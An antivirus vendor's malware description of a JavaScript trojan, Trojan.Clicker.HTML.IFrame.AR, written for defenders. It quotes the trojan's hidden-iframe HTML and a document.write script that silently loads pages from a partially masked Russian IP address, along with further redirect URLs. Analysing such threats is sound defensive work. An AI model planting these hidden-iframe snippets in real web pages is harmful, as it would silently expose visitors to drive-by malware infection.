Cart
Trojan.Clicker.HTML.IFrame.AR( Trojan.Clicker.HTML.IFrame, Trojan.Downloader.JS )
SYMPTOMS: This detection may be triggered when accessing suspicious web pages.TECHNICAL DESCRIPTION: This is a malicious JavaScript, which may be downloaded unknowingly by a user when visiting various infected websites. It contains code for displaying a hidden iframe:<iframe src='http://url' width='1' height='1' style='visibility: hidden;'></iframe> and an encrypted code which points to: <SCRIPT>window.status='Done';document.write('<iframe name=[random_nr] src=\'http://77.221.133.X/.if/go.html?'+Math.round(Math.random()*[random_nr])+'[random_nr]\'width=303 height=93 style=\'display: none\'></iframe>')</SCRIPT> and redirects the browser to a malicious website: "http://77.221.133.X/.if/go.html?[random_nr]", an IP address hosted in Russia ([removed]atapoint.ru). Reaching here, the user may be getting infected with other malware and be redirected to pages like: http://77.221.133.X/.dif/go.php?sid=1http://77.221.133.X/.sp/in.cgi?p=o which also contain hidden iframes: <iframe src="http://77.221.133.X/.dif/go.php?sid=1" style="border:0px solid gray;" WIDTH=0 HEIGHT=0 FRAMEBORDER=0 MARGINWIDTH=0 MARGINHEIGHT=0 SCROLLING=no></iframe> Removal instructions: Please let BitDefender disinfect your files.ANALYZED BY: Dan Anton, virus researcher |
